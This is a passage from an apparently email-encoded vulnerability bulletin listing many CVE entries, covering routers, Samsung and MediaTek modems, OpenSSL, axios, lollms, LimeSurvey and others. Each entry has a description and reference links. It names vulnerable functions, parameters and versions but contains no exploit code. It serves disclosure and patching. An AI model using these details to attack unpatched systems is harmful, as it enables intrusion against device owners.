parameter in the /webgl.asp endpoint. 2026-04-08 not yet calculated CVE-20= 25-50673 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50673 ] https://www.= dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 Tendacn[.]com -- AC6 WiFi Router Tenda AC6 15.03.05.16_multi is vuln= erable to Buffer Overflow in the formSetCfm function via the funcname, func= para1, and funcpara2 parameters. 2026-04-08 not yet calculated CVE-2025-522=
21 [ https://www.cve.org/CVERecord?id=3DCVE-2025-52221 ] https://github.com= /faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_overflow/detail= .md
https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003=C2=A0 D-Link DI-8003 v16.07.26A1, DI-= 8500 v16.07.26A1; DI-8003G v17.12.21A1, DI-8200G v17.12.20A1, DI-8200 v16.0= 7.26A1, DI-8400 v16.07.26A1, DI-8004w v16.07.26A1, DI-8100 v16.07.26A1, and=
DI-8100G v17.12.20A1 were discovered to contain a buffer overflow via the = rd_en, rd_auth, rd_acct, http_hadmin, http_hadminpwd, rd_key, and rd_ip par= ameters in the radius_asp function. This vulnerability allows attackers to = cause a Denial of Service (DoS) via a crafted request. 2026-04-08 not yet c= alculated CVE-2025-52222 [ https://www.cve.org/CVERecord?id=3DCVE-2025-5222=
2 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580=
, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command l= eads to a buffer overflow via a certain ioctl message, issue 1 of 2. 2026-0= 4-07 not yet calculated CVE-2025-52908 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-52908 ] https://semiconductor.samsung.com/support/quality-suppo= rt/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-52908/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580=
, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command l= eads to a buffer overflow via a certain ioctl message, issue 2 of 2. 2026-0= 4-07 not yet calculated CVE-2025-52909 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-52909 ] https://semiconductor.samsung.com/support/quality-suppo= rt/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-52909/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in NAS in Samsung Mobile Processor, Weara= ble Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330=
, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads=
to a Denial of Service. 2026-04-06 not yet calculated CVE-2025-54324 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2025-54324 ] https://semiconductor.sams= ung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54324/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in SMS in Samsung Mobile Processor, Weara= ble Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330=
, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, and Modem 5400. A Stack-based Buffer Overflow occurs while parsing SM=
S RP-DATA messages. 2026-04-06 not yet calculated CVE-2025-54328 [ https://= www.cve.org/CVERecord?id=3DCVE-2025-54328 ] https://semiconductor.samsung.c= om/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54328/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor amd Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480=
, 1580, W920, W930, and W1000. Improper synchronization on a global variabl=
e leads to a double free. An attacker can trigger a race condition by invok= ing an ioctl function concurrently from multiple threads. 2026-04-06 not ye=
t calculated CVE-2025-54601 [ https://www.cve.org/CVERecord?id=3DCVE-2025-5= 4601 ] https://semiconductor.samsung.com/support/quality-support/product-se= curity-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54601/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in the Wi-Fi driver in Samsung Mobile Pro= cessor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480=
, 1580, W920, W930, and W1000. Improper synchronization on a global variabl=
e leads to a use-after-free. An attacker can trigger a race condition by in= voking an ioctl function concurrently from multiple threads. 2026-04-06 not=
yet calculated CVE-2025-54602 [ https://www.cve.org/CVERecord?id=3DCVE-202= 5-54602 ] https://semiconductor.samsung.com/support/quality-support/product= -security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54602/
=C2=A0 n/a--GenieACS In GenieACS 1.2.13, an unauthenticated access vulnerab= ility exists in the NBI API endpoint. 2026-04-07 not yet calculated CVE-202= 5-56015 [ https://www.cve.org/CVERecord?id=3DCVE-2025-56015 ] https://githu= b.com/genieacs/genieacs/
https://github.com/e1st/CVE-2025-56015
=C2=A0 Apache Software Foundation--Apache Airflow When user logged out, the=
JWT token the user had authtenticated with was not invalidated, which coul=
d lead to reuse of that token in case it was intercepted. In Airflow 3.2 we=
implemented the mechanism that implements token invalidation at logout. Us= ers who are concerned about the logout scenario and possibility of intercep= ting the tokens, should upgrade to Airflow 3.2+ Users are recommended to up= grade to version 3.2.0, which fixes this issue. 2026-04-09 not yet calculat=
ed CVE-2025-57735 [ https://www.cve.org/CVERecord?id=3DCVE-2025-57735 ] htt= ps://github.com/apache/airflow/pull/61339 https://github.com/apache/airflow/pull/56633 https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in Samsung Mobile Processor, Wearable Pro= cessor, and Modem (Exynos 980, 850, 990, 1080, 2100, 1280, 2200, 1330, 1380=
, 1480, 2400, 1580, 2500, 1680, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, Modem 5400, and Modem 5410). The absence of proper input validation l= eads to a Denial of Service. 2026-04-06 not yet calculated CVE-2025-57834 [=
https://www.cve.org/CVERecord?id=3DCVE-2025-57834 ] https://semiconductor.= samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-54328/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in RRC in Samsung Mobile Processor, Weara= ble Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330=
, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem = 5300, and Modem 5400. Improper memory initialization results in an illegal = memory access, causing a system crash via a malformed RRCReconfiguration me= ssage. 2026-04-06 not yet calculated CVE-2025-57835 [ https://www.cve.org/C= VERecord?id=3DCVE-2025-57835 ] https://semiconductor.samsung.com/support/qu= ality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-57835/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in L2 in Samsung Mobile Processor, Wearab=
le Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330,=
1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5= 300, and Modem 5400. Incorrect handling of LTE MAC packets containing many = MAC Control Elements (CEs) leads to baseband crashes. 2026-04-06 not yet ca= lculated CVE-2025-58349 [ https://www.cve.org/CVERecord?id=3DCVE-2025-58349=
] https://semiconductor.samsung.com/support/quality-support/product-securi= ty-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-58349/
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in USIM in Samsung Mobile Processor, Wear= able Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 133=
0, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem=
5300, and Modem 5400. Improper handling of SIM card proactive commands lea=
ds to a Denial of Service. 2026-04-06 not yet calculated CVE-2025-59440 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2025-59440 ] https://semiconductor.sa= msung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-59440/
=C2=A0 n/a--n/a An open redirect in Ascertia SigningHub User v10.0 allows a= ttackers to redirect users to a malicious site via a crafted URL. 2026-04-0=
6 not yet calculated CVE-2025-61166 [ https://www.cve.org/CVERecord?id=3DCV= E-2025-61166 ] https://linkedin.com/in/thakur-nikhil https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166= -bf5d708cd241
=C2=A0 Apache Software Foundation--Apache DolphinScheduler An Exposure of S= ensitive Information to an Unauthorized Actor vulnerability exists in Apach=
e DolphinScheduler. This vulnerability may allow unauthorized actors to acc= ess sensitive information, including database credentials. This issue affec=
ts Apache DolphinScheduler versions 3.1.*. Users are recommended to upgrade=
to: * version =E2=89=A5 3.2.0 if using 3.1.x As a temporary workaround, us= ers who cannot upgrade immediately may restrict the exposed management endp= oints by setting the following environment variable: ``` MANAGEMENT_ENDPOIN= TS_WEB_EXPOSURE_INCLUDE=3Dhealth,metrics,prometheus ``` Alternatively, add = the following configuration to the application.yaml file: ``` management: = =C2=A0 =C2=A0endpoints: =C2=A0 =C2=A0 =C2=A0web: =C2=A0 =C2=A0 =C2=A0 =C2=
=A0 exposure: =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 include: health,metrics,pr= ometheus ``` This issue has been reported as CVE-2023-48796: https://cvepro= cess.apache.org/cve5/CVE-2023-48796 2026-04-09 not yet calculated CVE-2025-= 62188 [ https://www.cve.org/CVERecord?id=3DCVE-2025-62188 ] https://lists.a= pache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo https://www.cve.org/CVERecord?id=3DCVE-2023-48796
=C2=A0 axios--axios Axios is a promise based HTTP client for the browser an=
d Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normal= ization when checking NO_PROXY rules. Requests to loopback addresses like l= ocalhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY match= ing and go through the configured proxy. This goes against what developers = expect and lets attackers force requests through a proxy, even if NO_PROXY =
is set up to protect loopback or internal services. This issue leads to the=
possibility of proxy bypass and SSRF vulnerabilities allowing attackers to=
reach sensitive loopback or internal services despite the configured prote= ctions. This vulnerability is fixed in 1.15.0. 2026-04-09 not yet calculate=
d CVE-2025-62718 [ https://www.cve.org/CVERecord?id=3DCVE-2025-62718 ] http= s://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5 https://github.com/axios/axios/pull/10661 https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f2= 4df
https://datatracker.ietf.org/doc/html/rfc1034#section-3.1 https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2 https://github.com/axios/axios/releases/tag/v1.15.0
=C2=A0 Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Process=
or Exynos An issue was discovered in Samsung Mobile Processor, Wearable Pro= cessor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380,=
1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, a=
nd Modem 5400. An out-of-bounds write occurs due to a mismatch between the = TP-UDHI and UDL values when processing an SMS TP-UD packet. 2026-04-07 not = yet calculated CVE-2025-62818 [ https://www.cve.org/CVERecord?id=3DCVE-2025= -62818 ] https://semiconductor.samsung.com/support/quality-support/product-= security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-= updates/cve-2025-62818/
=C2=A0 n/a--LimeSurvey A Reflected Cross-Site Scripting (XSS) affects LimeS= urvey versions prior to 6.15.11+250909, due to the lack of validation of gi=
d parameter in getInstance() function in application/models/QuestionCreate.= php. This allows an attacker to craft a malicious URL and compromise the lo= gged in user. 2026-04-09 not yet calculated CVE-2025-63238 [ https://www.cv= e.org/CVERecord?id=3DCVE-2025-63238 ] https://github.com/LimeSurvey/LimeSur= vey/commit/80769a677dc82ddb1fcced4af19bd959d583208d https://gist.github.com/masquerad3r/f913ab479e8de2ad71987ef98a088fb5
=C2=A0 n/a--n/a An issue in JXL 9 Inch Car Android Double Din Player Androi=
d v12.0 allows attackers to force the infotainment system into accepting fa= lsified GPS signals as legitimate, resulting in the device reporting an inc= orrect or static location. 2026-04-07 not yet calculated CVE-2025-69515 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2025-69515 ] http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main= /README.md
=C2=A0 n/a--n/a An issue was discovered in Kiamo before 8.4 allowing authen= ticated administrative attackers to execute arbitrary PHP code on the serve=
r. 2026-04-09 not yet calculated CVE-2025-70364 [ https://www.cve.org/CVERe= cord?id=3DCVE-2025-70364 ] http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/20= 25-12-23-CVE-2025-70364-Kiamo.md
=C2=A0 Kiamo[.]com -- Kiamo A stored cross-site scripting (XSS) vulnerabili=
ty exists in Kiamo before 8.4 due to improper output encoding of user-suppl= ied input in administrative interfaces. An authenticated administrative use=
r can inject arbitrary JavaScript code that is executed in the browser of u= sers viewing the affected pages. 2026-04-09 not yet calculated CVE-2025-703=
65 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70365 ] http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/20= 25-12-23-CVE-2025-70365-Kiamo.md
=C2=A0 n/a-- Limesurvey Cross Site Scripting vulnerability in Limesurvey v.= 6.15.20+251021 allows a remote attacker to execute arbitrary code via the B= ox[title] and box[url] parameters. 2026-04-09 not yet calculated CVE-2025-7= 0797 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70797 ] https://gist.git= hub.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d https://github.com/LimeSurvey/LimeSurvey/pull/4356
=C2=A0 n/a--n/a Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3= .3.15 allows a local attacker to execute arbitrary code via the login funct= ion and the authentication mechanism 2026-04-09 not yet calculated CVE-2025= -70810 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70810 ] https://github= .com/ariefibis
https://www.linkedin.com/in/mohammed-a-6a2548112/ https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30
=C2=A0 n/a--n/a Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3= .3.15 allows a local attacker to execute arbitrary code via the Admin Contr=
ol Panel icon management functionality. 2026-04-09 not yet calculated CVE-2= 025-70811 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70811 ] https://git= hub.com/ariefibis
https://www.linkedin.com/in/mohammed-a-6a2548112/ https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822 =C2=A0 n/a--Yaffa=C2=A0 yaffa v2.0.0 is vulnerable to Cross Site Scripting = (XSS). An attacker can inject malicious JavaScript into the "Add Account Gr= oup" function on the account-group page, allowing execution of arbitrary sc= ript in the context of users who view the affected page. 2026-04-07 not yet=
calculated CVE-2025-70844 [ https://www.cve.org/CVERecord?id=3DCVE-2025-70= 844 ] https://github.com/kantorge/yaffa https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844 =C2=A0 n/a--n/a Dual DHCP DNS Server 8.01 improperly accepts and caches UDP=
DNS responses without validating that the response originates from a legit= imate configured upstream DNS server. The implementation matches responses = primarily by TXID and inserts results into the cache, enabling a remote att= acker to inject forged responses and poison the DNS cache, potentially redi= recting victims to attacker-controlled destinations. 2026-04-07 not yet cal= culated CVE-2025-71058 [ https://www.cve.org/CVERecord?id=3DCVE-2025-71058 =
] https://sourceforge.net/projects/dhcp-dns-server/ https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058
=C2=A0 Google--Android In onHeaderDecoded of LocalImageResolver.java, there=
is a possible persistent denial of service due to resource exhaustion. Thi=
s could lead to local denial of service with no additional execution privil= eges needed. User interaction is not needed for exploitation. 2026-04-06 no=
t yet calculated CVE-2026-0049 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-0049 ] https://source.android.com/docs/security/bulletin/2026/2026-04-01 =C2=A0 Pegasystems--Pega Robot Studio An arbitrary file-write vulnerability=
in Pega Browser Extension (PBE) affects Pega Robotic Automation version 22=
.1 or R25 users who are running automations that work with Google Chrome or=
Microsoft Edge. A bad actor could create a website that includes malicious=
code. The vulnerability could occur if a Robot Runtime user navigates to t=
he malicious website. 2026-04-07 not yet calculated CVE-2026-1078 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2026-1078 ] https://support.pega.com/suppor= t-doc/pega-security-advisory-a26-vulnerability-remediation-note
=C2=A0 Pegasystems--Pega Browser Extension (PBE) A native messaging host vu= lnerability in Pega Browser Extension (PBE) affects users of all versions o=
f Pega Robotic Automation who have installed Pega Browser Extension. A bad = actor could create a website that contains malicious code that targets PBE.=
The vulnerability could occur if a user navigates to this website. The mal= icious website could then present an unexpected message box. 2026-04-07 not=
yet calculated CVE-2026-1079 [ https://www.cve.org/CVERecord?id=3DCVE-2026= -1079 ] https://support.pega.com/support-doc/pega-security-advisory-a26-vul= nerability-remediation-note
=C2=A0 parisneo--parisneo/lollms In parisneo/lollms version 2.1.0, the appl= ication's session management is vulnerable to improper access control due t=
o the use of a weak secret key for signing JSON Web Tokens (JWT). This vuln= erability allows an attacker to perform an offline brute-force attack to re= cover the secret key. Once the secret key is obtained, the attacker can for=
ge administrative tokens by modifying the JWT payload and resigning it with=
the cracked secret. This enables unauthorized users to escalate privileges=
, impersonate the administrator, and gain access to restricted endpoints. T=
he issue is resolved in version 2.2.0. 2026-04-07 not yet calculated CVE-20= 26-1114 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1114 ] https://huntr.= com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89 https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad= 55fed34
=C2=A0 parisneo--parisneo/lollms A Stored Cross-Site Scripting (XSS) vulner= ability was identified in the social feature of parisneo/lollms, affecting = the latest version prior to 2.2.0. The vulnerability exists in the `create_= post` function within `backend/routers/social/__init__.py`, where user-prov= ided content is directly assigned to the `DBPost` model without sanitizatio=
n. This allows attackers to inject and store malicious JavaScript, which is=
executed in the browsers of users viewing the Home Feed, including adminis= trators. This can lead to account takeover, session hijacking, and wormable=
attacks. The issue is resolved in version 2.2.0. 2026-04-10 not yet calcul= ated CVE-2026-1115 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1115 ] htt= ps://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead6= 9b8292a
=C2=A0 parisneo--parisneo/lollms A Cross-site Scripting (XSS) vulnerability=
was identified in the `from_dict` method of the `AppLollmsMessage` class i=
n parisneo/lollms prior to version 2.2.0. The vulnerability arises from the=
lack of sanitization or HTML encoding of the `content` field when deserial= izing user-provided data. This allows an attacker to inject malicious HTML =
or JavaScript payloads, which can be executed in the context of another use= r's browser. Exploitation of this vulnerability can lead to account takeove=
r, session hijacking, or wormable attacks. 2026-04-12 not yet calculated CV= E-2026-1116 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1116 ] https://hu= ntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead6= 9b8292a
=C2=A0 parisneo--parisneo/lollms An insufficient session expiration vulnera= bility exists in the latest version of parisneo/lollms. The application fai=
ls to invalidate active sessions after a password reset, allowing an attack=
er to continue using an old session token. This issue arises due to the abs= ence of logic to reject requests after a period of inactivity and the exces= sively long default session duration of 31 days. The vulnerability enables =
an attacker to maintain persistent access to a compromised account, even af= ter the victim resets their password. 2026-04-08 not yet calculated CVE-202= 6-1163 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1163 ] https://huntr.c= om/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b
=C2=A0 Python Software Foundation--CPython CR/LF bytes were not rejected by=
HTTP client proxy tunnel headers or host. 2026-04-10 not yet calculated CV= E-2026-1502 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1502 ] https://gi= thub.com/python/cpython/pull/146212 https://github.com/python/cpython/issues/146211 https://mail.python.org/archives/list/security-announce@python.org/thread/2= IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/ https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d= 3cef69
=C2=A0 huggingface--huggingface/transformers A vulnerability in the Hugging= Face Transformers library, specifically in the `Trainer` class, allows for = arbitrary code execution. The `_load_rng_state()` method in `src/transforme= rs/trainer.py` at line 3059 calls `torch.load()` without the `weights_only= =3DTrue` parameter. This issue affects all versions of the library supporti=
ng `torch>=3D2.2` when used with PyTorch versions below 2.6, as the `safe_g= lobals()` context manager provides no protection in these versions. An atta= cker can exploit this vulnerability by supplying a malicious checkpoint fil=
e, such as `rng_state.pth`, which can execute arbitrary code when loaded. T=
he issue is resolved in version v5.0.0rc3. 2026-04-07 not yet calculated CV= E-2026-1839 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1839 ] https://hu= ntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485 https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190= ca9bed0e5f8ca396
=C2=A0 Unknown--Link Whisper Free The Link Whisper Free WordPress plugin be= fore 0.9.1 has a publicly accessible REST endpoint that allows unauthentica= ted settings updates. 2026-04-07 not yet calculated CVE-2026-1900 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2026-1900 ] https://wpscan.com/vulnerabilit= y/dc10b627-7981-4c53-bc9d-e87418f3fcfc/
=C2=A0 MediaTek, Inc.--MediaTek chipset In Modem, there is a possible syste=
m crash due to a logic error. This could lead to remote denial of service, =
if a UE has connected to a rogue base station controlled by the attacker, w= ith no additional execution privileges needed. User interaction is not need=
ed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467. 2026-04-07=
not yet calculated CVE-2026-20431 [ https://www.cve.org/CVERecord?id=3DCVE= -2026-20431 ] https://corp.mediatek.com/product-security-bulletin/April-2026 =C2=A0 MediaTek, Inc.--MediaTek chipset In Modem, there is a possible out o=
f bounds write due to a missing bounds check. This could lead to remote esc= alation of privilege, if a UE has connected to a rogue base station control= led by the attacker, with no additional execution privileges needed. User i= nteraction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MS= V-4461. 2026-04-07 not yet calculated CVE-2026-20432 [ https://www.cve.org/= CVERecord?id=3DCVE-2026-20432 ] https://corp.mediatek.com/product-security-= bulletin/April-2026
=C2=A0 MediaTek, Inc.--MediaTek chipset In Modem, there is a possible out o=
f bounds write due to a missing bounds check. This could lead to remote esc= alation of privilege, if a UE has connected to a rogue base station control= led by the attacker, with no additional execution privileges needed. User i= nteraction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MS= V-4460. 2026-04-07 not yet calculated CVE-2026-20433 [ https://www.cve.org/= CVERecord?id=3DCVE-2026-20433 ] https://corp.mediatek.com/product-security-= bulletin/April-2026
=C2=A0 MediaTek, Inc.--MediaTek chipset In sec boot, there is a possible ou=
t of bounds write due to an integer overflow. This could lead to local deni=
al of service, if an attacker has physical access to the device, with User = execution privileges needed. User interaction is not needed for exploitatio=
n. Patch ID: ALPS09963054; Issue ID: MSV-3899. 2026-04-07 not yet calculate=
d CVE-2026-20446 [ https://www.cve.org/CVERecord?id=3DCVE-2026-20446 ] http= s://corp.mediatek.com/product-security-bulletin/April-2026
=C2=A0 Rocket.Chat--Rocket.Chat An open redirect vulnerability in Rocket.Ch=
at versions prior to 8.4.0 allows users to be redirected to arbitrary URLs =
by manipulating parameters within a SAML endpoint. 2026-04-10 not yet calcu= lated CVE-2026-22560 [ https://www.cve.org/CVERecord?id=3DCVE-2026-22560 ] = https://hackerone.com/reports/3418031 https://github.com/RocketChat/Rocket.Chat/pull/38994
=C2=A0 The Wikimedia Foundation--Mediawiki - Wikilove Extension Improper ne= utralization of alternate XSS syntax vulnerability in The Wikimedia Foundat= ion Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS).The is= sue has been remediated on the `master` branch, and in the release branches=
for MediaWiki versions 1.43, 1.44, and 1.45. 2026-04-07 not yet calculated=
CVE-2026-22711 [ https://www.cve.org/CVERecord?id=3DCVE-2026-22711 ] https= ://phabricator.wikimedia.org/T416502 https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3 =C2=A0 OpenPLC_V3--OpenPLC_V3 OpenPLC_V3 is vulnerable to an Initialization=
of a Resource with an Insecure Default vulnerability which could allow an = attacker to gain access to the system by bypassing authentication via an AP=
I. 2026-04-09 not yet calculated CVE-2026-28205 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-28205 ] https://www.cisa.gov/news-events/ics-advisories/= icsa-25-345-10
=C2=A0 OpenSSL--OpenSSL Issue summary: Applications using AES-CFB128 encryp= tion or decryption on systems with AVX-512 and VAES support can trigger an = out-of-bounds read of up to 15 bytes when processing partial cipher blocks.=
Impact summary: This out-of-bounds read may trigger a crash which leads to=
Denial of Service for an application if the input buffer ends at a memory = page boundary and the following page is unmapped. There is no information d= isclosure as the over-read bytes are not written to output. The vulnerable = code path is only reached when processing partial blocks (when a previous c= all left an incomplete block and the current call provides fewer bytes than=
needed to complete it). Additionally, the input buffer must be positioned =
at a page boundary with the following page unmapped. CFB mode is not used i=
n TLS/DTLS protocols, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead=
. For these reasons the issue was assessed as Low severity according to our=
Security Policy. Only x86-64 systems with AVX-512 and VAES instruction sup= port are affected. Other architectures and systems without VAES support use=
different code paths that are not affected. OpenSSL FIPS module in 3.6 ver= sion is affected by this issue. 2026-04-07 not yet calculated CVE-2026-2838=
6 [ https://www.cve.org/CVERecord?id=3DCVE-2026-28386 ] OpenSSL Advisory [ = https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/61f428a2fc6671= ede184a19f71e6e495f0689621 ]
=C2=A0 OpenSSL--OpenSSL Issue summary: An uncommon configuration of clients=
performing DANE TLSA-based server authentication, when paired with uncommo=
n server DANE TLSA records, may result in a use-after-free and/or double-fr=
ee on the client side. Impact summary: A use after free can have a range of=
potential consequences such as the corruption of valid data, crashes or ex= ecution of arbitrary code. However, the issue only affects clients that mak=
e use of TLSA records with both the PKIX-TA(0/PKIX-EE(1) certificate usages=
and the DANE-TA(2) certificate usage. By far the most common deployment of=
DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'u= nusable' any TLSA records that have the PKIX certificate usages. These SMTP=
(or other similar) clients are not vulnerable to this issue. Conversely, a=
ny clients that support only the PKIX usages, and ignore the DANE-TA(2) usa=
ge are also not vulnerable. The client would also need to be communicating = with a server that publishes a TLSA RRset with both types of TLSA records. =
No FIPS modules are affected by this issue, the problem code is outside the=
FIPS module boundary. 2026-04-07 not yet calculated CVE-2026-28387 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-28387 ] OpenSSL Advisory [ https://o= penssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/258a8f63b26995= ba357f4326da00e19e29c6acbe ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/444958deaf450a= ea819171f97ae69eaedede42c3 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/07e727d304746e= db49a98ee8f6ab00256e1f012b ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/7a4e08cee62a72= 8d32e60b0de89e6764339df0a7 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/ec03fa050b334= 6997ed9c5fef3d0e16ad7db8177 ]
=C2=A0 OpenSSL--OpenSSL Issue summary: When a delta CRL that contains a Del=
ta CRL Indicator extension is processed a NULL pointer dereference might ha= ppen if the required CRL Number extension is missing. Impact summary: A NUL=
L pointer dereference can trigger a crash which leads to a Denial of Servic=
e for an application. When CRL processing and delta CRL processing is enabl=
ed during X.509 certificate verification, the delta CRL processing does not=
check whether the CRL Number extension is NULL before dereferencing it. Wh=
en a malformed delta CRL file is being processed, this parameter can be NUL=
L, causing a NULL pointer dereference. Exploiting this issue requires the X= 509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the c= ertificate being verified to contain a freshestCRL extension or the base CR=
L to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malfor= med CRL to an application that processes it. The vulnerability is limited t=
o Denial of Service and cannot be escalated to achieve code execution or me= mory disclosure. For that reason the issue was assessed as Low severity acc= ording to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3=
